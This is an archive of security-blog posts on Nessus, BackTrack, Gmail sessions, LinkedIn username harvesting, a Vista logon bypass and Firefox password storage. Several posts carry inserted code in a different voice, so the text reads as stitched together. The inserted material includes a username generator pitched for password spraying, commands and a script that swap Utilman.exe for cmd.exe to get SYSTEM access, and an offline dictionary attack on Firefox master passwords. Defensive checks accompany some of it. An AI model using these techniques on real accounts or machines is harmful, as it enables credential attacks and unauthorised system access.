Tag Archives: how to

A Powerful Vulnerability Scanner: Nessus - Part I

This is the first of several posts about Nessus. It covers the general background: what Nessus is, how it is licensed, how to install and activate it, and how it works.

What is Nessus?

Nessus is a proprietary, comprehensive vulnerability scanner. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems.

It scans hosts for open ports and known vulnerabilities, so you see what an attacker would find and can fix it before they do. Later posts will show examples of the vulnerabilities Nessus can find.

I think of Nessus mainly as an outside-the-box scanner for remotely exposed services, and that is how it is usually used. It can also find default or weak passwords on those services, though.

If you are running a vulnerability management project, I recommend adding a second scanner for inside-the-box scanning, that is, vulnerabilities in the software installed on each machine. Nessus can do some of this with credentialed scans, but I like Sunbelt Network Security Inspector for this purpose.

Anyway, let's look at the license options for Nessus.

Licenses: What Licenses? Wasn't Nessus GPL and Free?

It was, but in 2005 the source was closed: Nessus moved to Tenable Network Security, a company co-founded by its creator. Tenable still maintains Nessus 2.0 under the GPL; version 3.0 and later are closed source.

Version 3.0 was the first release done by Tenable. It ran almost five times faster than v2 and was popular too, but having three licenses for one product confuses users.

The first type is the ProfessionalFeed license. With it, Tenable supports the application and delivers new plugins earlier than to the other feeds.

Pricing for the ProfessionalFeed is based upon the number of Nessus scanners in use within your organization, consultancy or service. The cost is $1,200 per scanner per year.

You can buy ProfessionalFeed from here.

The other type of License is HomeFeed License. A HomeFeed is available for free to individual home users, and cannot be used by organizations or individuals professionally.

The last one is the on-demand evaluation. It lets you evaluate the ProfessionalFeed by using a HomeFeed subscription commercially for 15 days. You may perform such an evaluation only once.

The on-demand evaluation does not give you access to the customer portal, nor to the features specific to the ProfessionalFeed but should be adequate to test Nessus. You can obtain an activation code here.

Installing and Activating Nessus

Installing Nessus is straightforward. You can download it from this link. It runs on Linux, Windows and Mac.

For this blog post, I installed it on a Windows machine.

After you set it up, don't forget to activate it. Remember, even non-professional use of Nessus requires activation: they send the activation key by e-mail, so grab the key and paste it into the dialog window.

How It Works

You need to understand how the software works before scanning the machines across the network.

The most important thing to know is that Nessus is an agentless scanner. What does agentless mean?

Some security software needs an agent installed on every machine you scan. Nessus works differently: it uses a client/server architecture. The client is where you run the software and configure the scan. The server (the nessusd daemon) is the machine that actually performs the scan you set up on the client.

Server and client can be the same machine. Note that you don't pay for each client, but you do pay for each server you install (each server needs its own license).

The client/server architecture brings some flexibility. The first benefit is remote scanning.

You can install the server inside the network and run the client from a remote place, say your home. This is helpful because the scanner itself sits inside the network, so you don't have to deal with firewall or IDS issues that can affect the scan results.

Second advantage is one machine is enough to run a scan for all the network. This is definitely time saving!

I will cover the usage and configuration of Nessus in the next blog post.

BackTrack 4 on Windows Machine

As I mentioned in "Some Updates About Myself", I will update my blog more frequently. Today I want to talk about BackTrack 4.

BackTrack is a lovely Linux distribution for security professionals. BackTrack 4 now uses Debian repositories, which makes it nicer for me.

If you want to run BackTrack on your windows machine, you can use LiveCD or a virtual machine.

The only virtual image I found was for VMware. VMware Player is not the best solution on a Windows machine: RAM and CPU usage go up and the host can get very slow. Virtual PC 2007, however, runs smoothly.

If you get the BackTrack VMware image from this link and cannot find an image for Virtual PC, don't worry. Install Virtual PC 2007 from here.

Then go to this website and get the VMDK converter. This program converts VMware disk images (.vmdk) into Virtual PC's virtual hard disk format (.vhd).

Use ‘letmein’ as your username and ‘bugmenot’ as your password ( Yeah, I don’t like to set up an account either!)

After unzipping the directory and starting the program, convert the BackTrack 4 image to a Virtual PC hard drive and attach it to a new virtual machine.

That is it!

Ask any question or problem you have.

About Gmail's Security

One of my friends recently had a problem with one of his Gmail accounts: the account was compromised. He was sure he was using a strong, unpredictable password. I asked him if he had ever used the internet in public places. His answer was no. He also uses an SSH proxy, so this cannot be a man-in-the-middle attack using ARP poisoning.

I am not sure whether Google's password database was attacked and compromised or it was just an individual problem, but I wanted to check my Gmail account to see what security features Gmail has.

My friend realized his account had been compromised when he discovered a backup e-mail address he knew nothing about.

The problem is that even though he can change the password, the current sessions stay open. This is bad, since the attacker can still read and send e-mail from his account.

After I checked my Gmail account I found the following:

[Screenshot: Gmail security settings]

As you see, Gmail shows us the last account activity by giving the login time.

If you click the details, you will see this screen:

[Screenshot: Gmail account activity details]

There are 5 IPs listed here. Now you can check whether you see any unfamiliar IP. I saw one. I checked it on whatismyipaddress.com and was surprised that it was from NY. I have an iPhone, so when I am on the 3G network I may use a NY IP. However, it was listed as IMAP instead of mobile, which made me a little uncomfortable.

I used my iPhone and checked whether it was using the same network number in the IP address field. Yes, it was! And I felt much better :)

There is a button at the upper left to sign out all of the open sessions except the current one. This makes sure that we are now the only one using this account.

I hope you enjoy these tips :)

Username harvesting from Social Media

In a previous blog post I mentioned some command line utilities you can use to extract user names from the internet.

Today I want to discuss one of these tools: Reconioter

Nowadays, everybody wants to be connected. People want to increase their social networking with facebook, myspace, Linkedin, etc.

Reconioter searches LinkedIn's company directories and generates possible user names. Its syntax is simple:

./usernameGen.py <query> <number of pages>

I installed it on my BackTrack 4 machine and did some testing. For example, if we want to learn some user names of Apple employees, we can run

./usernameGen.py Apple 2
anefkens
arnoldn
nefkensa
dnewell
dustinn
newelld
abologan
anatolb
bologana
pfrancois
paulf
francoisp
bbondy
brennb
bondyb
zbezdan
zsoltb
bezdanz
tinofaith
tobiasi
inofaitht
erami
eduardor
ramie

As you can see, after finding employee names the program outputs them in three common user name formats: first initial plus last name (anefkens), first name plus last initial (arnoldn), and last name plus first initial (nefkensa).

This tool is great for penetration testers who want to demonstrate some intelligence gathering techniques usage.
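The name-to-username step is the part of the tool worth understanding, so here is an added example (my own code, not Reconioter's) that turns a list of display names into candidates in the three formats shown above, plus a few extra formats real organizations use, which the page's tool does not generate. The sample names are constructed (the first two are inferred from the output above); dropping middle names and stripping accents and punctuation are assumptions about how directories are usually set up.

```python
from __future__ import annotations
import re
import unicodedata

# The three formats the tool printed above, in the same order:
# first initial + last name, first name + last initial, last name + first initial.
PAGE_FORMATS = {
    "flast": lambda f, l: f[0] + l,
    "firstl": lambda f, l: f + l[0],
    "lastf": lambda f, l: l + f[0],
}

# Extra formats common in real organisations (an assumption, beyond what the page's tool does).
EXTRA_FORMATS = {
    "first.last": lambda f, l: f + "." + l,
    "firstlast": lambda f, l: f + l,
    "first_last": lambda f, l: f + "_" + l,
    "last.first": lambda f, l: l + "." + f,
}


def name_parts(full_name: str) -> list[str]:
    """Normalise a display name into lower-case ASCII tokens.
    Accents are stripped (Álvarez -> alvarez) and punctuation inside a token is
    dropped (O'Brien -> obrien, Álvarez-Pérez -> alvarezperez)."""
    ascii_name = unicodedata.normalize("NFKD", full_name).encode("ascii", "ignore").decode()
    tokens = [re.sub(r"[^a-z]", "", t) for t in ascii_name.lower().split()]
    return [t for t in tokens if t]


def username_candidates(full_name: str, formats=PAGE_FORMATS) -> list[str]:
    """Candidates for one person. Middle names are ignored (assumption); a name
    with fewer than two usable tokens (a mononym, an empty string) yields nothing."""
    parts = name_parts(full_name)
    if len(parts) < 2:
        return []
    first, last = parts[0], parts[-1]
    return [fmt(first, last) for fmt in formats.values()]


def harvest(names, formats=PAGE_FORMATS) -> list[str]:
    """Candidates for a whole list of names, de-duplicated in first-seen order.
    Two people can collapse onto the same 'jsmith', which a real directory would
    have resolved with a digit suffix we cannot know from the outside."""
    seen, out = set(), []
    for name in names:
        for cand in username_candidates(name, formats):
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


# Constructed sample input: two names inferred from the output above, the rest made up
# to exercise accents, hyphens, middle names and a mononym.
SAMPLE_NAMES = ["Arnold Nefkens", "Dustin Newell", "José Álvarez-Pérez", "Mary Ann Smith", "Madonna"]

if __name__ == "__main__":
    for user in harvest(SAMPLE_NAMES, {**PAGE_FORMATS, **EXTRA_FORMATS}):
        print(user)
```

Feed the output straight into a password-spraying or OWA/VPN user-enumeration check, and keep the collision note in mind: the fewer distinct candidates you get per name, the more likely the real directory appends numbers.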

Owning Windows Vista with Linux

In this blog post I want to show you a security problem related to Windows Vista.

Vista is criticized mostly because it uses too many resources. But did you know that you can "own" Vista by using Linux?

That is right: you can get SYSTEM access on a Vista box without any password cracking, as long as you can boot it from your own media.

First, boot the machine from a Linux live CD (I used BackTrack 4).

Mount the Windows partition read-write and go to it. NTFS needs the ntfs-3g driver for write access; /dev/sda1 is assumed to be the Windows partition, check with fdisk -l:

mkdir -p /mnt/sda1
mount -t ntfs-3g /dev/sda1 /mnt/sda1
cd /mnt/sda1

Now, go to the System32 directory:

cd Windows/System32

Back up the Utilman.exe file:

mv Utilman.exe Utilman_backup.exe

Copy cmd.exe as Utilman.exe:

cp cmd.exe Utilman.exe

Unmount cleanly so the NTFS volume is left consistent, then reboot and remove the Linux live CD from the drive:

cd /
umount /mnt/sda1
reboot

[Screenshot: Vista logon screen]

At the logon screen, press Windows+U to invoke the Utility Manager (Ease of Access).

A command prompt should appear, since we now have cmd.exe in place of the original Utilman.exe, and it runs before anyone has logged in.

Type whoami to see who you are: NT AUTHORITY\SYSTEM!

Type explorer and you can do whatever you want!

[Screenshot: command prompt running as SYSTEM]

This simple example shows how important physical security is in your company or even at home: anyone who can boot the machine from their own media owns it. Full-disk encryption (BitLocker on Vista), a firmware password with a locked boot order, and checking that the accessibility binaries in System32 have not been replaced are the usual countermeasures. Restore the backed-up Utilman.exe when you are done.
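As an added example (my own code, not from the post), the same swap written as a script you can run from the live CD against the mounted partition, with the sanity checks you want before touching a real System32 (is the mount writable, is there already a backup), a restore step, and the defender-side check: an accessibility helper that is byte-identical to cmd.exe or powershell.exe is evidence of exactly this trick. The helper list generalizes beyond Utilman.exe to the other logon-screen binaries that are abused the same way (sethc.exe is the sticky-keys variant); that list and the shell names are assumptions, and demo() runs everything against a constructed fake System32 in a temp directory.

```python
from __future__ import annotations
import filecmp
import os
import shutil
import tempfile
from pathlib import Path

# Accessibility helpers Windows launches from the logon screen as SYSTEM. Assumed list.
LOGON_HELPERS = ["Utilman.exe", "sethc.exe", "osk.exe", "Narrator.exe", "Magnify.exe"]
SHELLS = ["cmd.exe", "powershell.exe"]


def _backup_path(target: Path) -> Path:
    return target.with_name(target.stem + "_backup" + target.suffix)  # Utilman_backup.exe


def swap_helper(system32: Path, helper: str = "Utilman.exe", shell: str = "cmd.exe") -> Path:
    """Replace <helper> with a copy of <shell>, keeping a backup (the offline trick above).
    Refuses to run if the files are missing, the mount is read-only, or a backup exists."""
    system32 = Path(system32)
    target, src = system32 / helper, system32 / shell
    backup = _backup_path(target)
    if not target.is_file() or not src.is_file():
        raise FileNotFoundError(f"{target} or {src} missing: wrong partition or path?")
    if not os.access(system32, os.W_OK):
        raise PermissionError(f"{system32} not writable: mount with ntfs-3g, not read-only ntfs")
    if backup.exists():
        raise FileExistsError(f"{backup} exists: already swapped, restore first")
    target.rename(backup)
    shutil.copy2(src, target)
    return backup


def restore_helper(system32: Path, helper: str = "Utilman.exe") -> None:
    """Put the original binary back after the exercise."""
    target = Path(system32) / helper
    backup = _backup_path(target)
    if not backup.is_file():
        raise FileNotFoundError(f"no backup at {backup}")
    target.unlink()
    backup.rename(target)


def find_swapped_helpers(system32: Path) -> list[str]:
    """Defender-side check: return the logon helpers that are byte-identical to a shell."""
    system32 = Path(system32)
    hits = []
    for helper in LOGON_HELPERS:
        h = system32 / helper
        if not h.is_file():
            continue
        if any((system32 / s).is_file() and filecmp.cmp(h, system32 / s, shallow=False) for s in SHELLS):
            hits.append(helper)
    return hits


def demo() -> dict:
    """Run swap, check, restore against a constructed fake System32 and report what happened."""
    root = Path(tempfile.mkdtemp())
    system32 = root / "Windows" / "System32"
    system32.mkdir(parents=True)
    (system32 / "cmd.exe").write_bytes(b"fake cmd.exe")          # constructed stand-ins
    (system32 / "Utilman.exe").write_bytes(b"fake Utilman.exe")
    (system32 / "sethc.exe").write_bytes(b"fake sethc.exe")
    result = {"before": find_swapped_helpers(system32)}
    backup = swap_helper(system32)
    result["after"] = find_swapped_helpers(system32)
    result["backup_is_original"] = backup.read_bytes() == b"fake Utilman.exe"
    restore_helper(system32)
    result["restored"] = find_swapped_helpers(system32)
    result["original_back"] = (system32 / "Utilman.exe").read_bytes() == b"fake Utilman.exe"
    shutil.rmtree(root)
    return result


if __name__ == "__main__":
    print(demo())
```

On a real box you would call swap_helper(Path("/mnt/sda1/Windows/System32")) from the live CD, and run find_swapped_helpers against a mounted image or a forensic copy of the disk when you suspect someone else has been at the machine.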

How Does Firefox Store Your Passwords? Is It Secure?

Introduction

I wanted to know more about how Firefox holds saved passwords when I was backing up my machine (http://realinfosec.blogspot.com/2009/08/backup-files-on-vista.html).

There are some online tools for this purpose. The best known one is Xmarks (previously Foxmarks). I didn't want to use it, since I was not sure how secure their servers are.

They offer using your own FTP server as an option. However, as you know, FTP itself is not a secure protocol. So I started to dig into the way Firefox stores passwords.

Password Files

After some research, here is what I found: Firefox stores passwords in two different files:

key3.db: This file stores the key database, i.e. the key that encrypts your saved passwords, protected by the master password. To transfer saved passwords you must copy this file along with the following file; without it the saved entries cannot be decrypted.

signons.sqlite: This file stores the saved passwords themselves, as an SQLite database. (SQLite is widely used; Google's Android OS for phones and other small devices includes it too.)

Both of these two files are located on the Firefox profile directory.

Linux –> ~/.mozilla/firefox/<profile folder>

Windows Vista/XP/2000 –> %APPDATA%\Mozilla\Firefox\Profiles\xxxxxxxx.default\

Windows 98/Me –> C:\WINDOWS\Application Data\Mozilla\Firefox\Profiles\xxxxxxxx.default\

Mac –> ~/Library/Mozilla/Firefox/Profiles/<profile folder> or ~/Library/Application Support/Firefox/Profiles/<profile folder>

If you upgraded Firefox from a previous version you will see something like signons3.txt. In that case Firefox kept passwords in a text file (yes, you read that right!).

This was one of the weakest parts of Firefox password storage. Before SQLite, Firefox kept passwords in a text file. The file was named signons.txt before Firefox 1.5. signons.txt did not only store passwords, it also stored the list of sites for which passwords are never saved.

After the Firefox team fixed a bug (I strongly suggest reading about this interesting MySpace bug!), they switched to signons2.txt. With Firefox 3.0 this file was replaced by signons3.txt, and now we have signons.sqlite. That is the evolution of the password file.
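Since the whole point of this digging was a backup, here is an added example (my own code, not anything Firefox ships) that finds the profile directories from profiles.ini in the locations listed above and copies key3.db plus whichever signons file the profile has into an owner-only folder, refusing to proceed when key3.db is missing because the signons file alone is useless. The profiles.ini layout used in demo() is a constructed sample, and the file-name list is an assumption covering the versions discussed in this post.

```python
from __future__ import annotations
import configparser
import os
import shutil
import sys
import tempfile
from pathlib import Path

# The key database plus whichever signons file the Firefox version left behind (assumed list).
KEY_FILE = "key3.db"
SIGNONS_FILES = ["signons.sqlite", "signons3.txt", "signons2.txt", "signons.txt"]


def default_firefox_dir() -> Path:
    """Directory holding profiles.ini, per the locations listed in the post."""
    if sys.platform.startswith("win"):
        return Path(os.environ["APPDATA"]) / "Mozilla" / "Firefox"
    if sys.platform == "darwin":
        return Path.home() / "Library" / "Application Support" / "Firefox"
    return Path.home() / ".mozilla" / "firefox"


def find_profiles(firefox_dir: Path) -> dict[str, Path]:
    """Parse profiles.ini and map profile name -> absolute profile directory."""
    ini = configparser.ConfigParser()
    if not ini.read(Path(firefox_dir) / "profiles.ini"):
        raise FileNotFoundError(f"no profiles.ini under {firefox_dir}")
    profiles = {}
    for section in ini.sections():
        if not section.startswith("Profile"):
            continue
        entry = ini[section]
        path = Path(entry["Path"])
        if entry.get("IsRelative", "1") == "1":   # relative paths are relative to profiles.ini
            path = Path(firefox_dir) / path
        profiles[entry["Name"]] = path
    return profiles


def export_password_files(profile_dir: Path, dest: Path) -> list[str]:
    """Copy key3.db and every signons file present into dest (created owner-only: without a
    master password these files are as good as plaintext). Returns the names copied."""
    profile_dir, dest = Path(profile_dir), Path(dest)
    if not (profile_dir / KEY_FILE).is_file():
        raise FileNotFoundError(f"{KEY_FILE} missing in {profile_dir}: signons would be undecryptable")
    dest.mkdir(parents=True, exist_ok=True)
    os.chmod(dest, 0o700)
    copied = []
    for name in [KEY_FILE] + SIGNONS_FILES:
        src = profile_dir / name
        if src.is_file():
            shutil.copy2(src, dest / name)
            os.chmod(dest / name, 0o600)
            copied.append(name)
    if copied == [KEY_FILE]:
        raise FileNotFoundError(f"no signons file found in {profile_dir}")
    return copied


def demo() -> dict:
    """Exercise both functions against a constructed profile tree in a temp directory."""
    root = Path(tempfile.mkdtemp())
    ff = root / ".mozilla" / "firefox"
    prof = ff / "Profiles" / "abcd1234.default"
    prof.mkdir(parents=True)
    (ff / "profiles.ini").write_text(
        "[General]\nStartWithLastProfile=1\n\n"
        "[Profile0]\nName=default\nIsRelative=1\nPath=Profiles/abcd1234.default\nDefault=1\n"
    )
    (prof / "key3.db").write_bytes(b"fake key3.db")              # constructed stand-ins
    (prof / "signons.sqlite").write_bytes(b"fake signons.sqlite")
    (prof / "places.sqlite").write_bytes(b"history, must not be copied")
    profiles = find_profiles(ff)
    copied = export_password_files(profiles["default"], root / "backup")
    result = {
        "profiles": {name: p.relative_to(ff).as_posix() for name, p in profiles.items()},
        "copied": copied,
        "dest_files": sorted(p.name for p in (root / "backup").iterdir()),
    }
    shutil.rmtree(root)
    return result


if __name__ == "__main__":
    print(demo())
```

For a real backup, call find_profiles(default_firefox_dir()) and pass the profile you want to export_password_files; to restore, copy the same files back into the new profile directory while Firefox is closed.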

Now let’s look at how Firefox encrypt saved passwords.

Encryption

There are basically two cases:

1-) Master password is not set: Are you kidding? I hope you will set one right after reading the next sentences. Without a master password the saved entries are still run through the encryption described below, but the key in key3.db is protected by an empty master password, so anyone who can copy signons.sqlite (or signons.txt) together with key3.db can decrypt every entry without knowing any secret. The values look like Base64 text because that is how the encrypted blobs are stored.

In practice this means there is effectively NO protection: everybody with access to your profile files can recover your passwords easily. PasswordViewer from EdMullen is a nice decoder for this purpose.

2-) Master password is set: In this case the key in key3.db is derived from the master password, and all saved passwords are encrypted under it and stored in signons.txt or signons.sqlite.

You may want to know which encryption algorithm Firefox uses. It is Triple DES in CBC mode. Enabling Federal Information Processing Standard (FIPS) 140 mode does not change that algorithm, but it forces a master password to be set and restricts the NSS module to approved ciphers:

Tools -> Options -> Advanced -> Encryption -> Security Devices -> Software Security Device -> NSS Internal PKCS #11 Module -> Enable FIPS

Then disable all the non-FIPS TLS cipher suites in about:config.

For more info check here.

How to Choose a Strong Master Password

The key for the encryption algorithm is derived from a salt stored in key3.db and the master password. This key decrypts the saved passwords.

This means the security of your saved passwords is directly tied to the strength of the master password: the derivation is cheap, so a short or dictionary master password can be guessed offline by anyone who has copied the two files. To choose a strong master password, consider the following:

1-) It should be easy to remember for YOU and hard to guess for OTHERS.

2-) Mozilla (and most other companies, such as Microsoft) suggests at least 8 characters with upper case, lower case, a number and a special symbol like #, $, % etc.

However, do you think this fulfills the first part of the first requirement? In other words, will such an alphanumeric-plus-special-character password be easy to remember?

If you think you have a really good memory, you can set your master password this way. However, remember that the master password is not easily recoverable (I will write another blog post on how to recover, i.e. hack, your master password). You can reset it, but that removes all saved passwords from the database.

3-) You can have a sentence or phrase which you can remember easily:

Itishardertocrackaprejudicethananatom

This way you won't have a hard time remembering the password, and it won't be cracked easily: a long passphrase is far outside the reach of brute force and is not in any dictionary.
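To make the "salt plus master password" point concrete, here is an added example (my own code, reproducing the key3.db derivation as implemented by public Firefox password recovery tools, not code from Mozilla or from this post) that derives the 3DES key and IV from the global salt, the entry salt and a candidate master password using nothing but SHA-1 and HMAC-SHA-1, and then runs a dictionary attack over a wordlist. Because no 3DES implementation is in the standard library, the oracle in demo() simply compares against the key of a constructed "victim" password; against real files the oracle is "decrypt the password-check entry with 3DES-CBC and see whether the plaintext starts with password-check". The salts and wordlist are constructed samples.

```python
from __future__ import annotations
import hashlib
import hmac
import time


def derive_3des_key(global_salt: bytes, entry_salt: bytes, master_password: str) -> tuple[bytes, bytes]:
    """key3.db derivation: three SHA-1 and three HMAC-SHA-1 operations, nothing slow.
    An unset master password is the empty string. Returns (24-byte 3DES key, 8-byte IV)."""
    hp = hashlib.sha1(global_salt + master_password.encode("utf-8")).digest()
    pes = entry_salt + b"\x00" * (20 - len(entry_salt))          # entry salt padded to 20 bytes
    chp = hashlib.sha1(hp + entry_salt).digest()
    k1 = hmac.new(chp, pes + entry_salt, hashlib.sha1).digest()
    tk = hmac.new(chp, pes, hashlib.sha1).digest()
    k2 = hmac.new(chp, tk + entry_salt, hashlib.sha1).digest()
    k = k1 + k2                                                   # 40 bytes
    return k[:24], k[-8:]


def guess_master_password(global_salt: bytes, entry_salt: bytes, wordlist, key_is_correct):
    """Offline dictionary attack. key_is_correct(key, iv) is the oracle (see lead-in).
    Returns the recovered master password, or None if it is not in the wordlist."""
    for candidate in wordlist:
        key, iv = derive_3des_key(global_salt, entry_salt, candidate)
        if key_is_correct(key, iv):
            return candidate
    return None


# Constructed 20-byte salts standing in for the global-salt and password-check entries of key3.db.
GLOBAL_SALT = bytes.fromhex("a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4")
ENTRY_SALT = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f00f1e2d3c")
WORDLIST = ["123456", "password", "qwerty", "P@ssw0rd", "letmein"]   # constructed sample


def demo() -> dict:
    """A weak master password falls to the wordlist; the passphrase from the post does not."""
    weak_key, _ = derive_3des_key(GLOBAL_SALT, ENTRY_SALT, "P@ssw0rd")
    strong_key, _ = derive_3des_key(GLOBAL_SALT, ENTRY_SALT, "Itishardertocrackaprejudicethananatom")
    start = time.perf_counter()
    weak = guess_master_password(GLOBAL_SALT, ENTRY_SALT, WORDLIST, lambda k, iv: k == weak_key)
    strong = guess_master_password(GLOBAL_SALT, ENTRY_SALT, WORDLIST, lambda k, iv: k == strong_key)
    elapsed = time.perf_counter() - start
    return {
        "weak": weak,                       # "P@ssw0rd": guessed
        "strong": strong,                   # None: not in any wordlist
        "guesses_per_second": int(2 * len(WORDLIST) / elapsed) if elapsed else None,
        "no_master_password_key_len": len(derive_3des_key(GLOBAL_SALT, ENTRY_SALT, "")[0]),
    }


if __name__ == "__main__":
    print(demo())
```

The guesses-per-second figure is the point: with the two files in hand, an attacker is limited only by how fast SHA-1 runs, which is why the 8-character rule of thumb is weaker here than a long passphrase.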

Conclusion

1-) If you want Firefox to save your passwords, use a master password to protect them.

2-) If you want to transfer your saved Firefox passwords, copy signonsN.txt (or signons.sqlite) together with key3.db into the Firefox profile directory on the other machine.

Another blog post will explain how to hack/recover Firefox passwords.

Update: I made a blog post about SQLite Database Browser. You can use SQLite db browser to learn more about fields in firefox databases.